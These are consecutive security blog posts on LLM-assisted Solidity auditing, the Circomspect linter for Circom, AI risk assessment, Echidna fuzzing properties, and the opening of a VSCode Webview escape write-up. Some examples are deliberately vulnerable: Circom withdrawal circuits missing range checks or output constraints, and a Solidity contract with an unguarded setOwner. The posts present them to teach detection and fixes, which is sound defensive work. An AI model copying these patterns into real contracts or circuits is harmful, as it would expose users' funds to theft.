Codex (and GPT-4) can’t beat humans on smart contract audits

By Artem Dinaburg, Chief Technology Officer; Josselin Feist, Principal Engineer; and Riccardo Schirone, Security Engineer

Is artificial intelligence (AI) capable of powering software security audits? Over the last four months, we piloted a project called Toucan to find out. Toucan was intended to integrate OpenAI’s Codex into our Solidity auditing workflow. This experiment went far beyond writing “where is the bug?” in a prompt and expecting sound and complete results.

Our multi-functional team, consisting of auditors, developers, and machine learning (ML) experts, put serious work into prompt engineering and developed a custom prompting framework that worked around some frustrations and limitations of current large language model (LLM) tooling, such as working with incorrect and inconsistent results, handling rate limits, and creating complex, templated chains of prompts. At every step, we evaluated how effective Toucan was and whether it would make our auditors more productive or slow them down with false positives.

The technology is not yet ready for security audits for three main reasons:

  1. The models are not able to reason well about certain higher-level concepts, such as ownership of contracts, re-entrancy, and fee distribution.
  2. The software ecosystem around integrating large language models with traditional software is too crude: everything is cumbersome, and there are virtually no developer-oriented tools, libraries, or type systems that work with uncertainty.
  3. There is a lack of development and debugging tools for prompt creation. To develop the libraries, language features, and tooling that will integrate core LLM technologies with traditional software, far more resources will be required.

Whoever successfully creates an LLM integration experience that developers love will create an incredible moat for their platform.

The above criticism still applies to GPT-4. Although it was released only a few days before the publication of this blog post, we quickly ran some of our experiments against GPT-4 (manually, via the ChatGPT interface). We conclude that GPT-4 presents an incremental improvement at analyzing Solidity code. While GPT-4 is considerably better than GPT-3.5 (ChatGPT) at analyzing Solidity, it is still missing key features, such as the ability to reason about cross-function reentrancy and inter-function relationships in general. There are also some capability regressions from Codex, like identification of variables, arithmetic expressions, and understanding of integer overflow. It is possible that with the proper prompting and context, GPT-4 could finally reason about these concepts. We look forward to experimenting more when API access to the large context GPT-4 model is released.

We are still excited at the prospect of what Codex and similar LLMs can provide: analysis capabilities that can be bootstrapped with relatively little effort. Although it does not match the fidelity of good algorithmic tools, for situations where no code analysis tools exist, something imperfect may be much better than having nothing.

Toucan was one of our first experiments with using LLMs for software security. We will continue to research AI-based tooling, integrating it into our workflow where appropriate, like auto-generating documentation for smart contracts under audit. AI-based capabilities are constantly improving, and we are eager to try newer, more capable technologies.

We want AI tools, too

Since we like to examine transformational and disruptive technologies, we evaluated OpenAI’s Codex for some internal analysis and transformation tasks and were very impressed with its abilities. For example, a recent intern integrated Codex within Ghidra to use it as a decompiler. This inspired us to see whether Codex could be applied to auditing Solidity smart contracts, given our expertise in tool development and smart contract assessments.

Auditing blockchain code is an acquired skill that takes time to develop (which is why we offer apprenticeships). A good auditor must synthesize multiple insights from different domains, including finance, languages, virtual machine internals, nuances about ABIs, commonly used libraries, and complex interactions with things like pricing oracles. They must also work within realistic time constraints, so efficiency is key.

We wanted Toucan to make human auditors better by increasing the amount of code they could investigate and the depth of the analysis they could accomplish. We were particularly excited because there was a chance that AI-based tools would be fundamentally better than traditional algorithmic-based tooling: it is possible to learn undecidable problems to an arbitrarily high accuracy, and program analysis bumps against undecidability all the time.

We initially wanted to see if Codex could analyze code for higher-level problems that could not be examined via static analysis. Unfortunately, Codex did not provide satisfactory results because it could not reason about higher-level concepts, even though it could explain and describe them in words.

We then pivoted to a different problem: could we use Codex to reduce the false positive rate from static analysis tools? After all, LLMs operate fundamentally differently from our existing tools. Perhaps they could provide enough signal to create new analyses that were previously untenable due to unacceptable false positive rates. Again, the answer was negative, as the number of failures was high even in average-sized code, and those failures were difficult to predict and characterize.

Below we’ll discuss what we actually built and how we went about assessing Toucan’s capabilities.

Was this worth our time?

Our assessment does not meet the rigors of scientific research and should not be taken as such. We attempted to be empirical and data-driven in our evaluation, but our goal was to decide whether Toucan warranted further development effort—not scientific publication.

At each point of Toucan development, we tried to assess whether we were on the right track. Before starting development, we manually checked whether Codex could identify vulnerabilities that humans had found in specific open-source contracts—and with enough prompt engineering, it could.

After we had the capability to try small examples, we focused on three main concepts that seemed within Codex’s capability to understand: ownership, re-entrancy, and integer overflow. (A quick note for the astute reader: Solidity 0.8 fixed most integer overflow issues; developing overflow checks was an exercise in evaluating Codex’s capability against past code.) We could, fairly successfully, identify vulnerabilities regarding these concepts in small, purpose-made examples.
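The ownership tests, for example, were small contracts along the following lines (a hypothetical sketch in the spirit of those tests, not one of the actual files), where the question posed to Codex was whether someone other than the current owner could become the owner:

pragma solidity ^0.8.0;

// Hypothetical example of a small, purpose-made ownership test.
// The bug: setOwner has no access control, so any caller can take ownership.
contract SmallOwnershipExample {
    address public owner;

    constructor() {
        owner = msg.sender;
    }

    function setOwner(address newOwner) external {
        owner = newOwner;
    }
}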

Finally, as we created enough tooling to automate asking questions against multiple larger contracts, we began to see the false positive and hallucination rates become too high. Although we had some success with ever more complex prompts, it was still not enough to make Toucan viable.

Below are some key takeaways from our experience.

Codex does not fully grasp the higher-level concepts that we would like to ask about, and explaining them via complex prompt engineering does not always work or produce reliable results. We had originally intended to ask questions about higher-level concepts like ownership, re-entrancy, fee distribution, how pricing oracles are used, or even automated market makers (AMMs). Codex does not fully understand many of these abstract concepts, and asking about them failed in the initial evaluation stage. It somewhat comprehends the simplest concept — ownership — but even then it cannot always correlate changes in the ‘owner’ variable with the concept of ownership. Codex does not appear to grasp re-entrancy attacks as a concept, even though it can describe them in natural language.

It is very easy to delude yourself by p-hacking a prompt that works for one or a few examples. It is extremely difficult to get a prompt that generalizes well across multiple, diverse inputs. For example, when testing whether Toucan could reason about ownership, we initially tried seven small (<50 LOC) examples from which we could determine a baseline. After a thorough prompt-engineering effort, Toucan could pass six out of seven tests, with the lone failing test requiring complex logic to induce the ownership change. We then tried the same prompt on eight larger programs (>300 LOC), among which Toucan identified 15 potential changes of ownership, with four false positives—including complete hallucinations. However, when we tried slight permutations of the original small tests, we could usually get the prompt to fail given relatively minor changes in input. Similarly, for integer overflow tests, we could get Toucan to successfully identify overflows in 10 out of 11 small examples, with one false positive—but a larger set of five contracts produced 12 positives, six of which were false, including four instances of complete hallucination or failure to follow directions.

Codex can be easily misled by small changes in syntax. Codex is not as precise as existing static analysis tools. It is easily confused by comments, variable names, and small syntax changes. A particular thorn is reasoning about conditionals (e.g., ==, !=, <, >), which Codex will seemingly ignore, drawing its conclusion from function and variable names instead.

Codex excels at abstract tasks that are difficult to define algorithmically, especially if errors in the output are acceptable. For example, Codex will excel at queries like “Which functions in this contract manipulate global state?” without having to define “global state” or “manipulate.” The results might not be exact, but they will often be good enough to experiment with new analysis ideas. And while it is possible to define queries like this algorithmically, it is infinitely easier to ask in plain language.

The failure modes of Codex are not obvious to predict, but they are different from those of Slither and likely similar static analysis tools based on traditional algorithms.

Figure 1: True positives (green) and false positives (red) found by Slither, Toucan, and both on some simple re-entrancy tests. The Toucan results are not encouraging.

We tried looking at the true/false positive sets of Slither and Toucan, and found that each tool had a different set of false positives/false negatives, with some overlap (Figure 1). Codex was not able to effectively reduce the false positive rate from a prototype Slither integer overflow detector. Overall, we noticed a tendency to reply affirmatively to our questions, increasing the number of positives discovered by Toucan.

Codex can perform basic static analysis tasks, but the rate of failure is too high to be useful and too difficult to characterize. This capability to perform successful analysis, even on short program fragments, is very impressive and should not be discounted! For languages that Codex understands but for which no suitable tooling exists, this capability could be extremely valuable—after all, some analysis could be much better than nothing. But the benchmark for Solidity is not nothing; we already have existing static analysis tooling that works very well.

How we framed our framework

During Toucan’s development, we created a custom prompting framework, a web-based front end, and rudimentary debugging and testing tools to evaluate prompts and to aid in unit and integration tests. The most important of these was the prompting framework.

Prompting framework

If we were making Toucan today, we’d probably just use LangChain. But at the time, LangChain did not have the features we needed. Frustratingly, neither OpenAI nor Microsoft offered an official, first-party prompting framework. This led us to develop a custom framework, with the goal that it should be possible for auditors to create new prompts without ever modifying Toucan’s code.

requires = ["emit-ownership-doc", "emit-target-contract",]
name = "Contract Ownership"
scope = "contract"
instantiation_condition = "any('admin' in s.name.lower() or 'owner' in s.name.lower() for s in contract.state_variables)"

[[questions]]
name = "can-change"
query = "Is it possible to change the `{{ contract | owner_variable }}` variable by calling a function in the `{{ contract.name }}` contract without aborting the transaction? Think through it step by step, and answer as 'Yes', 'No', or 'Unknown'. If 'Yes', please specify the function."
is_decision = true

[[questions]]
name = "who-can-call"
runtime_condition = "questions['can-change'].is_affirmative()"
query = """To reason about ownership:
1) First, carefully consider the code of the function
2) Second, reason step by step about the question.
Who can call the function successfully, that is, without aborting or reverting the transaction?"""
answer_start = """1) First, carefully consider the code of the function:"""

[[questions]]
name = "can-non-owner-call"
runtime_condition = "questions['can-change'].is_affirmative()"
query = "Can any sender who is not the current owner call the function without reverting or aborting?"
is_decision = true
finding_condition = "question.is_affirmative()"

Figure 2: Sample question chain asking about contract ownership. Before questions are emitted, the prompting framework also emits a specific explanation of what ownership means, with examples and information about the target contract.

Our framework supported chaining multiple questions together to support Chain of Thought and similar prompting techniques (Figure 2). Since GPT models like Codex are few-shot learners, our framework also supported adding background information and examples before forming a prompt.

The framework also supported filtering on a per-question basis, as some questions may be relevant only to specific kinds of contracts (say, only ERC-20 tokens), and others may apply only at a specific scope (e.g., a contract, function, or file). Finally, each question could be optionally routed to a different model.

The prompting framework also went to great lengths to abide by OpenAI’s API limitations, including batching questions into one API invocation and keeping track of both the token count and API invocation rate limits. We hit these limits often and were very thankful the Codex model was free while in beta.

Test data

One of our development goals was that we would never compromise customer data by sending it to an OpenAI API endpoint. We had a strict policy of running Toucan only against open-source projects on GitHub (which would already have been indexed by Codex) with published reports, like those on our Publications page.

We were also able to use the rather extensive test set that comes with Slither, and our “Building Secure Contracts” reference materials, as additional test data. It is important to note that some of these tests and reference materials may have been part of the Codex training set, which explains why we saw very good results on smaller test cases.

The missing tools

The lack of tooling from both OpenAI and Microsoft has been extremely disappointing, although that looks to be changing: Microsoft has a prompting library, and OpenAI recently released OpenAI Evals. The kinds of tools we’d have loved to see include a prompt debugger; a tree-graph visualization of tokens in prompts and responses with logprobs of each token; tools for testing prompts against massive data sets to evaluate quality; ways to ask the same question and combine results from counterexamples; and some plugins to common unit testing frameworks. Surely someone is thinking of the developers and making these tools?

Current programming languages lack the facilities for interfacing with neural-network-based systems like LLMs. A core issue is the lack of capability to work with nondeterminism and uncertainty. When using LLMs, every answer has some built-in uncertainty: the outputs are inherently probabilistic, not discrete quantities. This uncertainty should be handled at the type system level so that one does not have to explicitly deal with probabilities until it is necessary. A pioneering project from Microsoft Research called Infer.NET does this for .NET-based languages, but there seem to be few concrete examples and no real tooling to combine this with LLMs.

Prompt engineering, and surrounding tooling, are still in their infancy. The biggest problem is that you never know when you are done: even now, it is always possible that we were just one or two prompts away from making Toucan a success. But at some point, you have to give up in the face of costs and schedules. With this in mind, the $300K salary for a fantastic prompt engineer does not seem absurd: if the only difference between a successful LLM deployment and a failure is a few prompts, the job quickly pays for itself. Fundamentally, though, this reflects a lack of tooling to assess prompt quality and evaluate responses.

There is no particularly good way to determine if one prompt is better than another or if you’re on the right track. Similarly, when a prompt fails against an input, it is frustratingly difficult to figure out why and to determine, programmatically, which prompts are merely returning the wrong result versus completely hallucinating and misbehaving.

Unit tests are also problematic; the results are not guaranteed to be the same across runs, and newer models may not provide the same results as prior ones. There is certainly a solution here, but again, the tooling developers expect just isn’t there yet. OpenAI Evals is likely going to improve this situation.

Overall, the tooling ecosystem is lacking, and surprisingly, the biggest names in the field have not released anything substantial to improve the adoption and integration of LLMs into real software projects that people use. However, we are excited that the open source community is stepping up with really cool projects like LangChain and LlamaIndex.

Humans still reign supreme

OpenAI’s Codex is not yet ready to take over the job of software security auditors. It lacks the ability to reason about the proper concepts and produces too many false positives for practical usage in audit tasks. However, there is clearly a nascent capability to perform interesting analysis tasks, and underlying models should quickly get more capable. We are very excited to keep using the technology as it improves. For example, the new larger context window with GPT-4 may allow us to provide enough context and direction to handle complex tasks.

Even though Codex (and GPT-4) do not currently match mature algorithmic-based tools, LLM-based tools—even those of lower quality—may have interesting uses. For languages for which no analysis tooling exists, developers can bootstrap something from LLMs relatively quickly. The ability to provide some reasonable analysis where none previously existed may be considerably better than nothing at all.

We hope the ability to integrate language models into existing programs improves quickly, as there is currently a severe lack of languages, libraries, type systems, and other tooling for the integration of LLMs into traditional software. Disappointingly, the main organizations releasing LLMs have not released much tooling to enable their use. Thankfully, open-source projects are filling the gap. There is still enormous work to be done, and whoever can make a wonderful developer experience working with LLMs stands to capture developer mindshare.

LLM capability is rapidly improving, and if it continues, the next generation of LLMs may serve as capable assistants to security auditors. Before developing Toucan, we used Codex to take an internal blockchain assessment occasionally used in hiring. It didn’t pass—but if it were a candidate, we’d ask it to take some time to develop its skills and return in a few months. It did return—we had GPT-4 take the same assessment—and it still didn’t pass, although it did better. Perhaps the large context window version with proper prompting could pass our assessment. We’re very eager to find out!

Circomspect has more passes!

By Fredrik Dahlgren, Principal Security Engineer

TL;DR: We have released version 0.8.0 of Circomspect, our static analyzer and linter for Circom. Since our initial release of Circomspect in September 2022, we have added five new analysis passes, support for tags, tuples, and anonymous components, links to in-depth descriptions of each identified issue, and squashed a number of bugs. Please download the new version and tell us what you think!

New analysis passes

The new analysis passes, added to the tool’s initial nine, check for a range of issues that could occur in Circom code:

  1. Failure to properly constrain intermediate signals
  2. Failure to constrain output signals in instantiated templates
  3. Failure to constrain divisors in division operations to nonzero values
  4. Use of BN254-specific templates from Circomlib with a different curve
  5. Failure to properly constrain inputs to Circomlib’s LessThan circuit

Apart from finding the issue related to the Circomlib LessThan circuit discussed below, these analysis passes would also have caught the “million dollar ZK bug” recently identified by Veridise in the circom-pairing library.

To understand the types of issues that Circomspect can identify, let’s dig into the final example in this list. This analysis pass identifies an issue related to the LessThan circuit implemented by Circomlib, the de facto standard library for Circom. To fully understand the issue, we first need to take a step back and understand how signed values are represented by Circom.

Signed arithmetic in GF(p)

Circom programs operate on variables called signals, which represent elements in the finite field GF(p) of integers modulo a prime number p. It is common to identify the elements in GF(p) with the unsigned integers in the half-open interval [0, p). However, it is sometimes convenient to use field elements to represent signed quantities in the same way that we may use the elements in [0, 232) to represent signed 32-bit integers. Mirroring the definition for two’s complement used to represent signed integer values, we define val(x) as follows:
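In other words, writing q = floor(p/2), the definition is:

    val(x) = x        if 0 <= x <= q
    val(x) = x - p    if q < x < p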

We then say that a is less than b in GF(p) if val(a) < val(b) as signed integers. This means that q = floor(p/2) is the greatest signed value representable in GF(p), and that -q, represented by q + 1, is the least signed value representable in GF(p). It also means, perhaps somewhat surprisingly, that q + 1 is actually less than q. This is also how the comparison operator < is implemented by the Circom compiler.

As usual, we say that a is positive if a > 0 and negative if a < 0. One way to ensure that a value a is nonnegative is to restrict the size (in bits) of the binary representation of a. In particular, if the size of a is strictly less than log(p) - 1 bits, then a must be less than or equal to q and, therefore, nonnegative.

Circomlib’s ‘LessThan’ template

With this out of the way, let’s turn our attention to the LessThan template defined by Circomlib. This template can be used to constrain two input signals a and b to ensure that a < b, and is implemented as follows:

The LessThan template defined by Circomlib
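For reference, the template is essentially as follows (reproduced from memory of the Circomlib source; consult the library for the authoritative version):

template LessThan(n) {
    assert(n <= 252);
    signal input in[2];
    signal output out;

    component n2b = Num2Bits(n + 1);
    n2b.in <== in[0] + (1 << n) - in[1];

    out <== 1 - n2b.out[n];
}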

Looking at the implementation, we see that it takes an input parameter n and two input signals in[0] and in[1], and it defines a single output signal out. Additionally, the template uses the Num2Bits template from Circomlib to constrain the output signal out.

The Num2Bits template from Circomlib takes a single parameter n and can be used to convert a field element to its n-bit binary representation, which is given by the array out of size n. Since the size of the binary representation is bounded by the parameter n, the input to Num2Bits is also implicitly constrained to n bits. In the implementation of LessThan above, the expression (1 << n) + in[0] - in[1] is passed as input to Num2Bits, which constrains the absolute value |in[0] - in[1]| to n bits.

To understand the subtleties of the implementation of the LessThan template, let’s first consider the expected use case when both inputs to LessThan are at most n bits, where n is small enough to ensure that both inputs are nonnegative.

We have two cases to consider. If in[0] < in[1], then in[0] - in[1] is a negative n-bit value, and (1 << n) + in[0] - in[1] is a positive n-bit value. It follows that bit n in the binary representation of the input to Num2Bits is 0, and thus out must be equal to 1 - 0 = 1.

On the other hand, if in[0] ≥ in[1], then in[0] - in[1] is a nonnegative n-bit value (since both inputs are nonnegative), and (1 << n) + in[0] - in[1] is a positive (n + 1)-bit value with the most significant bit equal to 1. It follows that bit n in the binary representation of the input to Num2Bits is 1, and out must be given by 1 - 1 = 0.

This all makes sense and gives us some confidence if we want to use LessThan for range proofs in our own circuits. However, things become more complicated if we forget to constrain the size of the inputs passed to LessThan.

Using signals to represent unsigned quantities

To describe the first type of issue that may affect circuits defined using LessThan, consider the case in which signals are used to represent unsigned values like monetary amounts. Say that we want to allow users to withdraw funds from our system without revealing sensitive information, like the total balance belonging to a single user or the amounts withdrawn by users. We could use LessThan to implement the part of the circuit that validates the withdrawn amount against the total balance as follows:

The ValidateWithdrawal template should ensure that users cannot withdraw more than their total balance.
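A minimal sketch of such a template, consistent with the walkthrough below but not the exact code from the original figure (the 64-bit width and the include path are assumptions):

pragma circom 2.0.0;

include "circomlib/circuits/comparators.circom";

template ValidateWithdrawal() {
    signal input amount; // the amount the user wants to withdraw
    signal input total;  // the user's total balance

    // amount <= total, expressed as amount < total + 1
    component lt = LessThan(64);
    lt.in[0] <== amount;
    lt.in[1] <== total + 1;
    lt.out === 1;
}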

Now, suppose that a malicious user with a zero balance decides to withdraw p - 1 tokens from the system, where p is the size of the underlying prime field. Clearly, this should not be allowed since p - 1 is a ridiculously large number and, in any case, the user has no tokens available for withdrawal. However, looking at the implementation of LessThan, we see that in this case, the input to Num2Bits will be given by (1 << 64) + (p - 1) - (0 + 1) = (1 << 64) - 2 (as all arithmetic is done modulo p). It follows that bit 64 of the binary representation of the input will be 0, and the output from LessThan will be 1 - n2b.out[64] = 1 - 0 = 1. This also means that ValidateWithdrawal will identify the withdrawal as valid.

The problem here is that p - 1 also represents the signed quantity –1 in GF(p). Clearly, -1 is less than 1, and we have not constrained the withdrawn amount to be nonnegative. Adding a constraint restricting the size of the amount to be less than log(p) - 1 bits would ensure that the amount must be positive, which would prevent this issue.

More generally, since the input parameter n to LessThan restricts only the size of the difference |in[0] - in[1]|, we typically cannot use LessThan to prevent overflows and underflows. This is a subtle point that many developers miss. As an example, consider the section on arithmetic overflows and underflows from the zero-knowledge (ZK) bug tracker maintained by 0xPARC. In an earlier version, 0xPARC suggested using LessThan to constrain the relevant signals in an example that was almost identical to the vulnerable ValidateWithdrawal template defined above!

Another vulnerability of this type was found by Daira Hopwood in an early version of the ZK space-conquest game Dark Forest. Here, the vulnerability allowed users to colonize planets far outside the playing field. The developers addressed the issue by adding a range proof based on the Num2Bits template that restricted the size of the coordinates to 31 bits.

Using signals to represent signed quantities

Now, suppose signals are used to represent signed quantities. In particular, let’s consider what would happen if we passed q = floor(p/2) and q + 1 as inputs to LessThan. We will show that even though q + 1 < q according to the Circom compiler, q is actually less than q + 1 according to LessThan. Returning to the input to Num2Bits in the definition of LessThan, we see that if in[0] = q and in[1] = q + 1, the input to Num2Bits is given by the following expression:

(1 << n) + in[0] - in[1] = (1 << n) + q - (q + 1) = (1 << n) - 1

It follows that the nth bit in the binary representation of this value is 0, and the output from LessThan is 1 - n2b.out[n] = 1 - 0 = 1. Thus, q < q + 1 according to LessThan, even though q + 1 < q according to the compiler!

It is worth reiterating here that the input parameter n to LessThan does not restrict the size of the inputs, only the absolute value of their difference. Thus, we are free to pass very large (or very small) inputs to LessThan. Again, this issue can be prevented if both inputs to the LessThan template are restricted to less than log(p) - 1 bits.

Circomspect to the rescue (part 1)

To find issues of this type, Circomspect identifies locations where LessThan is used. It then tries to see whether the inputs to LessThan are constrained to less than log(p) - 1 bits using the Num2Bits template from Circomlib, and it emits a warning if it finds no such constraints. This allows the developer (or reviewer) to quickly identify locations in the codebase that require further review.

The output from the latest version of Circomspect running on the ValidateWithdrawal template defined above.

As shown in the screenshot above, each warning from Circomspect will now typically also contain a link to a description of the potential issue, and recommendations for how to resolve it.

Circomspect to the rescue (part 2)

We would also like to mention another of our new analysis passes. The latest version of Circomspect identifies locations where a template is instantiated but the output signals defined by the template are not constrained.

As an example, consider the ValidateWithdrawal template introduced above. Suppose that we rewrite the template to include range proofs for the input signals amount and total. However, during the rewrite we accidentally forget to include a constraint ensuring that the output from LessThan is 1. This means that users may be able to withdraw amounts that are greater than their total balance, which is obviously a serious vulnerability!

We rewrite ValidateWithdrawal to include range proofs for the two inputs amount and total, but accidentally forget to constrain the output signal lt.out to be 1!
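A hedged sketch of the rewritten (and now broken) template; as before, the exact widths and include paths are assumptions:

pragma circom 2.0.0;

include "circomlib/circuits/bitify.circom";
include "circomlib/circuits/comparators.circom";

template ValidateWithdrawal() {
    signal input amount;
    signal input total;

    // Range proofs restricting both inputs to 64 bits (and therefore nonnegative).
    component amountBits = Num2Bits(64);
    amountBits.in <== amount;
    component totalBits = Num2Bits(64);
    totalBits.in <== total;

    component lt = LessThan(64);
    lt.in[0] <== amount;
    lt.in[1] <== total + 1;
    // Bug: the constraint `lt.out === 1;` is missing, so the comparison is
    // computed but never enforced.
}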

There are examples (like Num2Bits) in which a template constrains its inputs and no further constraints on the outputs are required. However, forgetting to constrain the output from a template generally indicates a mistake and requires further review to determine whether it constitutes a vulnerability. Circomspect will flag locations where output signals are not constrained to ensure that each location can be manually checked for correctness.

Circomspect now generates a warning if it finds that the output signals defined by a template are not properly constrained.

Let’s talk!

We at Trail of Bits are excited about contributing to the growing range of tools and libraries for ZK that have emerged in the last few years. If you are building a project using ZK, we would love to talk to you to see if we can help in any way. If you are interested in having your code reviewed by us, or if you’re looking to outsource parts of the development to a trusted third party, please get in touch with our team of experienced cryptographers.

We need a new way to measure AI security

Tl;dr: Trail of Bits has launched a practice focused on machine learning and artificial intelligence, bringing together safety and security methodologies to create a new risk assessment and assurance program. This program evaluates potential bespoke risks and determines the necessary safety and security measures for AI-based systems.

If you’ve read any news over the past six months, you’re aware of the unbridled enthusiasm for artificial intelligence. The public has flocked to tools built on systems like GPT-3 and Stable Diffusion, captivated by how they alter our capacity to create and interact with each other. While these systems have amassed headlines, they constitute a small fraction of AI-based systems that are currently in use, powering technology that is influencing outcomes in all aspects of life, such as finance, healthcare, transportation and more. People are also attempting to shoehorn models like GPT-3 into their own applications, even though these models may introduce unintended risks or not be adequate for their desired results. Those risks will compound as the industry moves to multimodal models.

With people in many fields trying to hop on the AI bandwagon, we are dealing with security and safety issues that have plagued the waves of innovation that have swept through society in the last 50 years. This includes issues such as proper risk identification and quantification, responsible and coordinated vulnerability disclosures, and safe deployment strategies. In the rush to embrace AI, the public is at a loss as to the full scope of its impact, and whether these systems are truly safe. Furthermore, the work seeking to map, measure, and mitigate against newfound risks has fallen short, due to the limitations and nuances that come with applying traditional measures to AI-based systems.

The new ML/AI assurance practice at Trail of Bits aims to address these issues. With our forthcoming work, we not only want to ensure that AI systems have been accurately evaluated for potential risk and safety concerns, but we also want to establish a framework that auditors, developers and other stakeholders can use to better assess potential risks and required safety mitigations for AI-based systems. Further work will build evaluation benchmarks, particularly focused on cybersecurity, for future machine-learning models. We will approach the AI ecosystem with the same rigor that we are known to apply to other technological areas, and hope the services transform the way practitioners in this field work on a daily basis.

In a paper released by Heidy Khlaaf, our engineering director of ML/AI assurance, we propose a novel, end-to-end AI risk framework that incorporates the concept of an Operational Design Domain (ODD), which can better outline the hazards and harms a system can potentially have. ODDs are a concept that has been used in the autonomous vehicle space, but we want to take it further: By having a framework that can be applied to all AI-based systems, we can better assess potential risks and required safety mitigations, no matter the application.

We also discuss in the paper:

  • When “safety” doesn’t mean safety: The AI community has conflated “requirements engineering” with “safety measures,” but they are not the same thing. In fact, they are often contradictory!
  • The need for new measures: Risk assessment practices taken from other fields, such as hardware safety, don’t translate well to AI. More must be done to uncover design issues that directly lead to systematic failures.
  • When “safety” doesn’t mean “security”: The two terms are not interchangeable, and need to be assessed differently when applied to AI and ML systems.
  • It hasn’t been all bad: The absence of well-defined operational boundaries for general AI and ML models has made it difficult to accurately assess the associated risks and safety, given the vast number of applications and potential hazards. We discuss what models can be adapted, specifically those that can ensure security and reliability.

The AI community, and the general public, will suffer the same or worse consequences we’ve seen in the past if we cannot safeguard the systems the world is rushing to adopt. In order to do so, it’s essential to get on the same page when it comes to terminology and techniques for safety objectives and risk assessments. However, we don’t need to reinvent the wheel. Applicable techniques already exist; they just need to be adapted to the AI and machine-learning space. With both this paper and our practice’s forthcoming work, we hope to bring clarity and cohesion to AI assurance and safety, and to counter the marketing hype and exaggerated commercial messaging that deemphasize the security of this burgeoning technology.

This approach builds on our previous machine-learning work, and is just the beginning of our efforts in this domain. Any organizations interested in working with this team can contact Trail of Bits to inquire about future projects.

Reusable properties for Ethereum contracts

As smart contract security constantly evolves, property-based fuzzing has become a go-to technique for developers and security engineers. This technique relies on the creation of code properties – often called invariants – which describe what the code is supposed to do. To help the community define properties, we are releasing a set of 168 pre-built properties that can be used to guide Echidna, our smart contract fuzzing tool, or directly through unit tests. Properties covered include compliance with the most common ERC token interfaces, generically testable security properties, and properties for testing fixed point math operations.

Since mastering these tools takes time and practice, we will be holding two livestreams on our Twitch and YouTube channels that will provide hands-on experience with these invariants:

  • March 7 – ERC20 properties, example usage, and Echidna cheat codes (Guillermo Larregay)
  • March 14 – ERC4626 properties, example usage, and tips on fuzzing effectively (Benjamin Samuels)

Why should I use this?

The repository and related workshops will demonstrate how fuzzing can provide a much higher level of security assurance than unit tests alone. This collection of properties is simple to integrate with projects that use well-known standards or commonly-used libraries. This release contains tests for the ABDKMath64x64 library, ERC-20 token standard, and ERC-4626 tokenized vaults standard:

ERC20

  • Properties for standard interface functions
  • Inferred sanity properties (ex: no user balance should be greater than token supply)
  • Properties for extensions such as burnable, mintable, and pausable tokens.

ERC4626

  • Properties that verify rounding directions are compliant with spec
  • Reversion properties for functions that must never revert
  • Differential testing properties (ex: deposit() must match functionality predicted by previewDeposit())
  • Functionality properties (ex: redeem() deducts shares from the correct account)
  • Non-spec security properties (share inflation attack, token approval checks, etc.)

ABDKMath64x64

  • Commutative, associative, distributive, and identity properties for relevant functions
  • Differential testing properties (ex: 2^(-x) == 1/2^(x))
  • Reversion properties for functions which should revert for certain ranges of input
  • Negative reversion properties for functions that should not revert for certain ranges of input
  • Interval properties (ex: min(x,y) <= avg(x,y) <= max(x,y))
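To give a flavor of what one of these properties looks like, here is a hedged sketch (not the repository’s exact code) of the ERC20 sanity property mentioned above, written as an Echidna assertion test:

pragma solidity ^0.8.0;

interface IERC20Like {
    function balanceOf(address account) external view returns (uint256);
    function totalSupply() external view returns (uint256);
}

contract ERC20SanityPropertySketch {
    IERC20Like internal token;

    constructor(address tokenAddress) {
        token = IERC20Like(tokenAddress);
    }

    // Echidna (in assertion mode) calls this with fuzzed `user` values; the
    // assertion encodes "no user balance should be greater than token supply".
    function test_balance_never_exceeds_total_supply(address user) public {
        assert(token.balanceOf(user) <= token.totalSupply());
    }
}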

The goal of these properties is to detect vulnerabilities or deviations from expected results, ensure adherence to standards, and provide guidance to developers writing invariants. By following this workshop, developers will be able to identify complex security issues that cannot be detected with conventional unit and parameterized tests. Furthermore, using this repository will enable developers to focus on deeper systemic issues instead of wasting time on low-hanging fruit.

As a bonus, while creating and testing these properties, we found a bug in the ABDKMath64x64 library: for a specific range of inputs to the divuu function, an assertion could be triggered in the library. More information about the bug, from one of the library's authors, can be found here.

Do It Yourself!

If you don’t want to wait for the livestream, you can get started right now. Here’s how to add the properties to your own repo:

Let’s say you want to create a new ERC20 contract called YetAnotherCashEquivalentToken, and check that it is compliant with the standard. With the properties repository added to your project as a dependency, you create the following test contract for performing an external test:

pragma solidity ^0.8.0;
import "./path/to/YetAnotherCashEquivalentToken.sol";
import {ICryticTokenMock} from "@crytic/properties/contracts/ERC20/external/util/ITokenMock.sol";
import {CryticERC20ExternalBasicProperties} from "@crytic/properties/contracts/ERC20/external/properties/ERC20ExternalBasicProperties.sol";
import {PropertiesConstants} from "@crytic/properties/contracts/util/PropertiesConstants.sol";


contract CryticERC20ExternalHarness is CryticERC20ExternalBasicProperties {   
    constructor() {
        // Deploy ERC20
        token = ICryticTokenMock(address(new CryticTokenMock()));
    }
}

contract CryticTokenMock is YetAnotherCashEquivalentToken, PropertiesConstants {

    bool public isMintableOrBurnable;
    uint256 public initialSupply;
    constructor () {
        _mint(USER1, INITIAL_BALANCE);
        _mint(USER2, INITIAL_BALANCE);
        _mint(USER3, INITIAL_BALANCE);
        _mint(msg.sender, INITIAL_BALANCE);

        initialSupply = totalSupply();
        isMintableOrBurnable = false;
    }
}

Then, a configuration file is needed to set the fuzzing parameters to run in Echidna:

corpusDir: "tests/crytic/erc20/echidna-corpus-internal"
testMode: assertion
testLimit: 100000
deployer: "0x10000"
sender: ["0x10000", "0x20000", "0x30000"]
multi-abi: true

Finally, run Echidna on the test contract:

echidna-test . --contract CryticERC20ExternalHarness --config tests/echidna-external.yaml

Furthermore, this effort is fluid. Some ideas for future work include:

  • Test more of the widely-used mathematical libraries with our properties, such as PRBMath (properties/issues/2).
  • Add tests for more ERC standards (properties/issues/5).
  • Create a corpus of tests for other commonly used functions or contracts that are not standards, such as AMMs or liquidity pools (properties/issues/4).

Escaping well-configured VSCode extensions (for profit)

By Vasco Franco

In part one of this two-part series, we escaped Webviews in real-world misconfigured VSCode extensions. But can we still escape extensions if they are well-configured?

In this post, we’ll demonstrate how I bypassed a Webview’s localResourceRoots by exploiting small URL parsing differences between the browser (i.e., the Electron-created Chromium instance where VSCode and its Webviews run) and other VSCode logic, combined with an over-reliance on the browser to do path normalization. This bypass allows an attacker with JavaScript execution inside a Webview to read files anywhere on the system, including those outside the localResourceRoots. Microsoft assigned this bug CVE-2022-41042 and awarded us a bounty of $7,500 (about $2,500 per minute of bug finding).

Finding the issue

